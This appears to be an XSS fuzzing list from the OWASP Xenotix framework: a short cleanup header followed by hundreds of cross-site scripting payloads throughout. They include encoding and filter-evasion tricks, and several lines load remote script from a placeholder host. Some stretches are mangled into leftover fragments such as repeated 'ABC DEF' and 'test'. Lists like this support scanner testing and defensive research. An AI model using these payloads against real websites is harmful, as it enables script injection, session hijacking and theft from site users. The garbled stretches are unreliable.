# # Original source is from # https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/blob/master/Scanner/xenotix_main.resx # # * XML-decoded # * Duplicates removed # * arious forms of control-characters normalized # * Non-XSS removed # * Obsolete XSS removed (e.g. one for src=livescript lol circa 1995) # %00 � # not doing XSS inside a comment # --> "'`><%00img src=xxx:x onerror=javascript:alert(1)> %00“> '`"><%00script>javascript:alert(1) 0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) OnMouseOver {Firefox & Opera} 1 1 1> 1> 1`> 1`> 1 '%20onmouseover=alert(1)' --> %22%20onmouseover=javascript:alert(1)%20%22 %22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E %22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(1);> %22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E %26'%22%3E%3Cscript%3Ealert(%2Fkcf%2F)%3C%2Fscript%3E%3D %27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E ">

%00 ">' %3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E %3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E %3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E %3cimg onerror=alert(1) src=a%3e "'`><%3Cimg src=xxx:x onerror=javascript:alert(1)> %3Cscript%3Ea%3D%2FKCF%2F %3Cscript%3Ealert(1)%3B%3C%2Fscript%3E '`"><%3Cscript>javascript:alert(1) %3Cscript>javascript:alert(1) “%3e%3cscript%3ealert(1)%3c/script%3e --> %7D%3C/style%3E43%27%22%3E%3C/title%3E%3Cscript%3Ea=eval;b=alert;a(b(/KCF/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EKCF%3C/h1%3E%3C/marquee%3E XYZClickMe KCF "'`>ABC
DEF "'`>ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF test test test test test test test test test test test test test test test test test test kcf test test test test test test test test test test test test test test test kcf kcf test test test XXKCF kcf kcf test test test1 test1 KCF test test test test test test test test test test test test test test kcf test test test test test test kcf [data "1
"] data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E data:text/html,%3Cscript%3Ealert(1)%3C/script%3E data:text/html,
kcf

X

X

KCF

x

style="x:">
DIV

XXX

XXX

X
X

X

.

KCF
XXX

X
X

KCF
XXX

kcf/div>
X

X
x
x
x

x
x

X
{IE7}
]>&x; %E0 exp/* exp/* exp/* feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e feed:data:text/html,%3csvg%20onload=alert%281%29%3e /XXX KCF +ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('KCF');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-%25(payload)s;+ADw-/SCRIPT+AD4- htmlStr = 'kcf'; document.getElementById('body').innerHTML = htmlStr; try { alert(1);}catch(e){alert(1);}; htmlStr = 'kcf'; document.getElementById('body').innerHTML = htmlStr; try { if(document.getElementById('body').firstChild.protocol === 'javascript:') { alert(1); } }catch(e){alert(1);}; KCF""","XML namespace."),(""" http://%22%20onerror=%22alert%281%29;// http://www.keralacyberforcealert(1) <iframe name=x>"> <iframe onreadystatechange=alert(1)> <iframe/onreadystatechange=alert(1) <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"> <iframe/src="data:text/html;&Tab;base64&Tab;,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="> <iframe srcdoc='<body onload=prompt(1)>'> <iframe srcdoc="&LT;iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>>"> <iframe src=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html < <iframe src="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html" width="800" height="800">iframe /iframe/src/ <iframe src iframe src="javascript:javascript:alert(1)"> <IFRAME SRC="javascript:javascript:alert(1);"> <iframe src=mhtml:http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.gif!kcf.html>   <image src=1 href=1 onerror="javascript:alert(1)"></image> <image src="javascript:alert(1)"> <img %00src=x onerror="alert(1)"> <img %00src=x onerror="javascript:alert(1)"> <img/	
 src=`~` onerror=prompt(1)> <img%10src=x onerror="javascript:alert(1)"> <img %11src=x onerror="javascript:alert(1)"> <img%11src=x onerror="javascript:alert(1)"> <img %12src=x onerror="javascript:alert(1)"> <img%13src=x onerror="javascript:alert(1)"> <img%32src=x onerror="javascript:alert(1)"> <img %34src=x onerror="javascript:alert(1)"> <img %39src=x onerror="javascript:alert(1)"> <img %47src=x onerror="javascript:alert(1)"> <img%47src=x onerror="javascript:alert(1)"> <img/anyjunk/onerror=alert(1) src=a> <img dynsrc="javascript:alert(1);"> <IMG DYNSRC="javascript:alert(1)"> <IMG DYNSRC="javascript:alert('KCF')"> <IMG DYNSRC="javascript:javascript:alert(1)"> <img language=”JScript.Encode” onerror=”#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@” src=a> <img language=vbs src=<b onerror=alert#1/1#> <IMG LOWSRC="javascript:alert(1)"> <IMG LOWSRC="javascript:alert('KCF')"> <IMG LOWSRC="javascript:javascript:alert(1)"> "/><img/onerror=%09javascript:alert(1)%09src=xxx:x /> "/><img/onerror=%0Ajavascript:alert(1)%0Asrc=xxx:x /> "/><img/onerror=%0Bjavascript:alert(1)%0Bsrc=xxx:x /> "/><img/onerror=%0Cjavascript:alert(1)%0Csrc=xxx:x /> "/><img/onerror=%0Djavascript:alert(1)%0Dsrc=xxx:x /> "/><img/onerror=%20javascript:alert(1)%20src=xxx:x /> "/><img/onerror=%22javascript:alert(1)%22src=xxx:x /> "/><img/onerror=%27javascript:alert(1)%27src=xxx:x /> "/><img/onerror=%60javascript:alert(1)%60src=xxx:x /> <img onerror=alert(1) src=a> <img onerror=a&#0108ert(1) src=a> <img onerror=alert(1) src=a> <img onerror=a&#108ert(1) src=a> <img onerror=`alert(1)`src=a> <img onerror=’alert(1)’src=a> <img onerror=”alert(1)”src=a> <img onerror=alert(1) src=a> <img/onerror=alert(1) src=a> <img/onerror=alert(1) src=a> <img/onerror=alert(1) src=a> «img onerror=alert(1) src=a» <iMg onerror=alert(1) src=a> <img onerror=alert(1) src=a> <img onerror=alert(1) src=a> <img onerror=alert(1) src=a> <img onerror=MsgBox+1 language=vbs src=a> <img onerror=”VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@” src=a> <IMG ONERROR=”VBS:EXECSCRIPT LCASE(‘ALERT(1)’)” SRC=A> <img onerror=”vbs:MsgBox 1” src=a> <IMG ONERROR=”VBS:MSGBOX 1” SRC=A> <img onerror=eval('al\u0065rt(1)') src=a> "`'/><img/onload=alert(1) src=""/> <IMG onmouseover="alert('kcf')"> <IMG """><SCRIPT>alert(1)</SCRIPT>"> <IMG """><SCRIPT>alert("KCF")</SCRIPT>"> <img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <img/src=`%00` onerror=this.onerror=confirm(1) <img src%00=x onerror="javascript:alert(1)"> <img src%09=x onerror="javascript:alert(1)"> <IMG SRC=javascript:alert('KCF');> <img src=javasc ript:ale rt('XSS')> <IMG SRC=javascript:alert('XSS')> <img src%10=x onerror="javascript:alert(1)"> <img src%11=x onerror="javascript:alert(1)"> <img src%12=x onerror="javascript:alert(1)"> <img src%13=x onerror="javascript:alert(1)"> <IMG SRC="  javascript:alert(1);"> <IMG SRC="  javascript:alert('KCF');"> <img src=1 href=1 onerror="javascript:alert(1)"></img> <img src="1" onerror="alert(1)"> <img src=1 onerror="alert(1)"> <img/src="1"/onerror="alert(1)" `"'><img src='#%27 onerror=javascript:alert(1)> <img/src=@  onerror = prompt('1') <img src%32=x onerror="javascript:alert(1)"> <img src%47=x onerror="javascript:alert(1)"> <img src=a onerror=alert(1) <img src=a onerror=alert(1) %0A> <img src=a onerror=alert(1)%0A>a <img src="blah>" onmouseover="alert(1);"> <img src="blah"onmouseover="alert(1);"> <img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/> <img src="http://XXXxenotixXXX:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)> <img src="http://XXXxenotixXXX:3555/xss_serve_payloads/gif.gif" onerror=alert(1)> <img src='http://XXXxenotixXXX:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"'> <img src='http://XXXxenotixXXX:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"'> <img src="http://XXXxenotixXXX:3555/xss_serve_payloads/image.png" onerror=alert(1)> <img src="http://XXXxenotixXXX:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)> <img/src='http://XXXxenotixXXX:3555/xss_serve_payloads/jpg.jpg' onmouseover=&Tab;prompt(1) <img src='http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html' onload=alert(1)//></img> <img src='http://XXXxenotixXXX:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"'> <img src='http://XXXxenotixXXX:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"'> <img src=x onerror=alert(1)//"> <img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)> <img src=x onerror=javascript:alert(1)//"> <![><img src="]><img src=x onerror=javascript:alert(1)//"> <img src ?itworksonchrome?\/onerror = alert(1) <img src="javascript:alert(1)"> <IMG SRC=`javascript:alert(1)`> <IMG SRC="javascript:alert(1);" <IMG SRC="javascript:alert(1);"> <IMG SRC="javascript:alert(1)" <IMG SRC=javascript:alert(1)> "><IMG SRC=javascript:alert(1)> <IMG SRC=JaVaScRiPt:alert(1)> <IMG SRC="javascript:alert('KCF');"> <IMG SRC="javascript:alert('KCF')" <IMG SRC=javascript:alert('KCF')> <IMG SRC=javascript:alert("KCF")> <IMG SRC=JaVaScRiPt:alert('KCF')> <IMG SRC=`javascript:alert("KCF says, 'KCF'")`> <IMG SRC=`javascript:alert(“KCF says, ‘KCF’”)`> <IMG SRC=`javascript:alert("Kerala Cyber Force, 'KCF'")`> <IMG SRC=`javascript:alert("Kerala Cyber Force says, 'KCF'")`> <IMG SRC=javascript:alert("KCF")> <IMG SRC=javascript:alert(String.fromCharCode(75,67,70))> <IMG SRC=`javascript:javascript:alert(1)`> <IMG SRC="javascript:javascript:alert(1);"> <IMG SRC="javascript:javascript:alert(1)" <IMG SRC=javascript:javascript:alert(1)> <img src=kcf onerror=alert(1)> <img src ?kcf?\/onerror = alert(1) <img src=# onerror%3D"javascript:alert(1)" > <img src=/ onerror=alert(1);> <img src="" onerror=alert(1)> <img src="" onerror=alert(1);> <img src=# onerror="alert(1)" > "><img src=/ onerror=alert(1);> <img src="" onload=alert(1)> <IMG SRC=# onmouseover="alert('kcf')"> <img src="/" =_=" title="onerror='prompt(1)'"> <img src='vbscript:do%63ument.lo%63ation="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html"'> <IMG SRC='vbscript:msgbox(1)'> <IMG SRC='vbscript:msgbox("KCF")'> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <img src=x:alert(alt) onerror=eval(src) alt=0> <img src="x:alert" onerror="eval(src%2b'(1)')"> <IMG SRC="  javascript:alert(1);"> <img src="x:gif" onerror="eval('al'%2b'lert(1)')"> <img src="x:gif" onerror="window['al%0065rt'](1)"></img> <img src="x:kcf" onerror="alert(1)"> <img src=\"x:kcf\" onerror=\"alert(1)\"> <img src=x onerror=%00"javascript:alert(1)"> <img src=x onerror=%09"javascript:alert(1)"> <img src=x onerror=%10"javascript:alert(1)"> <img src=x onerror=%11"javascript:alert(1)"> <img src=x onerror=%12"javascript:alert(1)"> <img src=x onerror=%32"javascript:alert(1)"> <img src=x onError="javascript:alert(1)"/> "><img src=x onerror=prompt(1);> "><img src=x onerror=window.open('https://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html');> "><img src=x onerror=window.open('http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html"');> <img src="x:? title=" onerror=alert(1)//"> ><img src="x:x" onerror=alert(1)> <img src='xx:x><img src=xx:x onerror=alert(1)>'> <img src='xx:x onerror="alert(1)">'> <img src='xx:x\ onerror="alert(1)">'> <img src=x:xx onerror="try {execScript('a=1','vbs');alert(1);}catch(e){alert(1);}"> `"'><img src=xxx:x %00onerror=javascript:alert(1)> `"'><img src=xxx:x %09onerror=javascript:alert(1)> `"'><img src=xxx:x %0Aonerror=javascript:alert(1)> `"'><img src=xxx:x %0Bonerror=javascript:alert(1)> `"'><img src=xxx:x %0Conerror=javascript:alert(1)> `"'><img src=xxx:x %0Donerror=javascript:alert(1)> `"'><img src=xxx:x %20onerror=javascript:alert(1)> `"'><img src=xxx:x %2Fonerror=javascript:alert(1)> <img src=xx:xx alt=`/onerror=alert(1)//`> `"'><img src=xxx:x onerror%00=javascript:alert(1)> `"'><img src=xxx:x onerror%09=javascript:alert(1)> `"'><img src=xxx:x onerror%0A=javascript:alert(1)> `"'><img src=xxx:x onerror%0B=javascript:alert(1)> `"'><img src=xxx:x onerror%0C=javascript:alert(1)> `"'><img src=xxx:x onerror%0D=javascript:alert(1)> `"'><img src=xxx:x onerror%20=javascript:alert(1)> `"'><img src=xxx:x onerror=alert(1)>  <img src=xxx:x onerror=alert(1)> --> "'`><img src=xxx:x onerror=alert(1)> <img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a> --> <img src=xxx:x onerror=javascript:alert(1)> --> <img src=xx:xx onerror=window[['alert']](1)> <img src=xx:xx onerror="&#X61;lert(1);alert(1)"> <img src=xx:xx onerror="x='\',alert(1)//'"> <IMG STYLE="kcf:expr/KCF/ession(alert(1))"> <IMG STYLE="KCF:expr/KCF/ession(alert(1))"> <IMG STYLE="KCF:expr/KCF/ession(alert('KCF'))"> <IMG STYLE="kcf:expr/KCF/ession(javascript:alert(1))"> <img type=image src=kcf.gif onreadystatechange=alert(1)> <?import namespace="t" implementation="#default#time2"> <?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="KCF<SCRIPT DEFER>alert("KCF")</SCRIPT>"></BODY></HTML> <input autofocus onfocus=alert(1)> <input id='1'><input id=1><script>alert(1)</script> <input id=x><input id=x><script>alert(x)</script> <input onblur=alert(1) autofocus><input autofocus> <input onblur=javascript:alert(1) autofocus><input autofocus> <input onblur=write(1) autofocus><input autofocus> <input onfocus=javascript:alert(1) autofocus> <input onfocus=write(1) autofocus> <input/onmouseover="javaSCRIPT&colon;confirm(1)" <input type="image" dynsrc="javascript:alert(1);"> <INPUT TYPE="IMAGE" SRC="javascript:alert(1);"> <INPUT TYPE="IMAGE" SRC="javascript:alert('KCF');"> <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <input type=image src=kcf.gif onreadystatechange=alert(1)> <input type="text" AUTOFOCUS onfocus=alert(1)> <input type="text" value=``<div/onmouseover='alert(1)'>X</div> <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> <input value=<><iframe/src=javascript:confirm(1) <isindex action=javascript:alert(1) type=image> <isindex type=image src=1 onerror=alert(1)> <isindex type=image src=kcf.gif onreadystatechange=alert(1)> kcf%20-%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E kcf%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E "'`>kcf<div style="font-family:'foo;x:expression(alert(1));/';">kcf "'`>kcf<div style="font-family:'foo'x:expression(alert(1));/';">kcf kcf<div style="x:expression(alert(1))">kcf kcf<div style="xexpression(alert(1))">kcf <KCF STYLE="behavior: url(%25(htc)s);"> <KCF STYLE="behavior: url(KCF.htc);"> <KCF STYLE="kcf:expression(alert(1))"> <KCF STYLE="KCF:expression(alert(1))"> <KCF STYLE="KCF:expression(alert('KCF'))"> <KCF STYLE="kcf:expression(javascript:alert(1))"> <keygen autofocus onfocus=alert(1)> <keygen onfocus=javascript:alert(1) autofocus> <LAYER SRC="javascript:alert(1);"></LAYER> <link rel=stylesheet href=data:,%7bx:expression(javascript:alert(1))%7d <link rel=stylesheet href=data:,%7bx:expression(write(1))%7d <LINK REL="stylesheet" HREF="javascript:alert(1);"> <LINK REL="stylesheet" HREF="javascript:alert('KCF');"> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <li style=list-style:url() onerror=alert(1)></li> <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%25%3Csvg/%25%3E);visibility:hidden onload=javascript:alert(1)></div> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <marquee onstart='javascript:alert(1)'>^__^ <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <math><a xlink:href="//XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp">KCF <math><a xlink:href="//XXXxenotixXXX:3555/xss_serve_payloads/kcf.js">KCF <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <META HTTP-EQUIV="Link" Content="<%25(css)s>; REL=stylesheet"> <META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet"> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//"> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4="> "><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4="> <meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="> "><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4="> <meta http-equiv="refresh" content="0; url=data:text/html;blabla,<script>alert(1)</script>"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('KCF');"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> "><meta http-equiv="refresh" content="0;url=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html" "><meta http-equiv="refresh" content="0;url=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html"> <meta HTTP-EQUIV="REFRESH" content="0; url=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html"> "><meta HTTP-EQUIV="REFRESH" content="0; url=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('KCF');"> <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <meta http-equiv=refresh content="javascript:alert('1')"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1)</SCRIPT>"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1)</SCRIPT>"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('KCF')</SCRIPT>"> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(1)></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <object classid="clsid:..." codebase="javascript:alert(1);"> <object data="data:text/html;base64,%25(base64)s"> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></object> <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object> <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgnS0NGJyk8L3NjcmlwdD4=></object> <object data="javascript:alert(1)"> <object data=javascript:alert(1)> <object data=javascript&colon;%0061l&#101%72t(1)> object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <object onerror=alert(1)> <object onerror=javascript:javascript:alert(1)> <object onError object onError="javascript:javascript:alert(1)"></object onError> <object src=1 href=1 onerror="javascript:alert(1)"></object> <object type=image src=kcf.gif onreadystatechange=alert(1)></object> <object type="text/x-scriptlet" data="http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp"></object> <OBJECT TYPE="text/x-scriptlet" DATA="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.html"></OBJECT> <object type="text/x-scriptlet" data="http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js"></object> <OBJECT TYPE="text/x-scriptlet" DATA="%25(scriptlet)s"></OBJECT> +onerror=alert(1)%3E/ onerror=eval;throw'alert%281%29'; +onerror=prompt(1)%3E/ onload='KCF' \" onload=\"KCF\"/onload=\"KCF\"/onload='KCF'/ onmouseover=alert(1); 'onmouseover='alert(1)'a=' "onmouseover="alert(1)"a=" "onmouseover=alert(1);a=" </plaintext\></|\><plaintext/onmouseover=prompt(1) <p/onmouseover=javascript:alert(1); >KCF</p> <p style="background:url('javascript:alert(1)')"> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <p style="font-family:'\22\3bx:expression(alert(1))/'"> "'`><p><svg><script>a='hello%27;javascript:alert(1)//';</script></p> "'`><p><svg><script>a='kcf;alert(1)//';</script></p> <p><svg><script>alert(1)</script></p> s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27KCF%3F%29%29 s%22%20style=%22background:url(javascript:alert(’KCF’)) s%22%20style=x:expression(alert(1)) <scr%00ipt%20&message=> alert(‘kcf’)</script> <<scr\0ipt/src=http://XXXxenotixXXX:3555/xss_serve_payloads/bmpz.bmp></script <<scr\0ipt/src=http://XXXxenotixXXX:3555/xss_serve_payloads/kcf.js></script <script /%00/>/%00/alert(1)/%00/</script /%00/ <script>~'%0061' ; %0074%0068%0072%006F%0077 ~ %0074%0068%0069%0073. %0061%006C%0065%0072%0074(~'%0061')</script U+ <script>~'%0061' ; %0074%0068%0072%006F%0077 ~ %0074%0068%0069%0073. %0061%006C%0065%0072%0074(~'%0061')</script U+ <script>({0:#0=alert/#0#/#0#(1)})</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>/ %00/javascript:alert(1)// /</script> <script%00>javascript:alert(1)</script> "`'><script>%00javascript:alert(1)</script> <script%09>javascript:alert(1)</script> "`'><script>%09javascript:alert(1)</script> <script%09type="text/javascript">javascript:alert(1);</script> <script%0A>javascript:alert(1)</script> "`'><script>%0Ajavascript:alert(1)</script> <script%0Atype="text/javascript">javascript:alert(1);</script> "`'><script>%0Bjavascript:alert(1)</script> <script%0C>javascript:alert(1)</script> "`'><script>%0Cjavascript:alert(1)</script> <script%0Ctype="text/javascript">javascript:alert(1);</script> <script%0D>javascript:alert(1)</script> "`'><script>%0Djavascript:alert(1)</script> <script%0Dtype="text/javascript">javascript:alert(1);</script> <script>+-+-1-+-+alert(1)</script> ><script>1<\\/script> \"><script>1<\\/script> \\\'><script>1<\\/script> <script%20>javascript:alert(1)</script> "`'><script>%20javascript:alert(1)</script> <script%20language=vbscript>msgbox%20KCF</script> <script%20type="text/javascript">javascript:alert(1);</script> "`'><script>%21javascript:alert(1)</script> <script>/ %2A/javascript:alert(1)// /</script> "`'><script>%2Bjavascript:alert(1)</script> <script%2F>javascript:alert(1)</script> '"`><script>/ %2Fjavascript:alert(1)// /</script> <script%2Ftype="text/javascript">javascript:alert(1);</script> "`'><script>%3Bjavascript:alert(1)</script> <script%3Etype="text/javascript">javascript:alert(1);</script> <ScRipT 5-03+9/3=>prompt(1)</ScRipT giveanswerhere=? "`'><script>%7Ejavascript:alert(1)</script> <script>a%006cert(1);</script> <SCRIPT>a=/kcf/ <SCRIPT>a=/KCF/ <script>a='kcf\\';alert(1)//kcf';</script> <SCRIPT>a=/KCF/alert(a.source)</SCRIPT> "'`><script>a=/kcf;;i=0;alert(1);a/i;</script> <SCRIPT>a=/KCF/\nalert(1);</SCRIPT> <script ~>alert(0%250)</script ~> <<SCRIPT>alert(1);/ <script>alert(1,1</script//)</script> <script>alert(1,1</script/)</script> <script>alert(1)/kcf/'</script> <script>’alert(1)’.replace(/.+/,eval)</script> <<script>alert(1);</script> <script>alert(1);</script> <%25 <script<{alert(1)}/></script </> <script>/ /alert(1)// /</script> <script>alert(\'\\/\\1\\/\\\')</script> <script>alert(\'\\\\1\\\\\')</script> <script>alert(\'1\')</script> <script>alert(1) &'"><script>alert(/kcf/)</script> <script>alert(/KCF/)</script> <script>alert("/KCF"/)</script> ”><script>alert(“KCF”)</script> \"><script>alert(/KCF/)<script> <ScriPt>ALeRt(“ KCF ”)</scriPt> <<SCRIPT>alert("KCF");//<</SCRIPT> <SCRIPT>+alert("KCF")</SCRIPT> <SCRIPT>+alert("KCF");</SCRIPT> &'"><script>alert(/kcf/)</script> <script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script> <script>alert([!![]] [])</script> <script>alert([!![]]+[])</script> <script ^^>alert(String.fromCharCode(49))</script ^^ <script>alert(String.fromCharCode(75,67,70))</script> ‘><script>alert(String.fromCharCode(75,67,70))</script> ‘/><script>alert(String.fromCharCode(75,67,70))</script> "><script>alert(String.fromCharCode(75,67,70))</script> “><script>alert(String.fromCharCode(75,67,70))</script> “/><script>alert(String.fromCharCode(75,67,70))</script> !–<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{} ‘;!–<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{} <script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script> <script allbrowserkcf>/<script /alert(1)</script <script>[{'a':Object.prototype.defineSetter('b',function(){alert(arguments[0])}),'b':['secret']}]</script> <SCRIPT "a='>'" 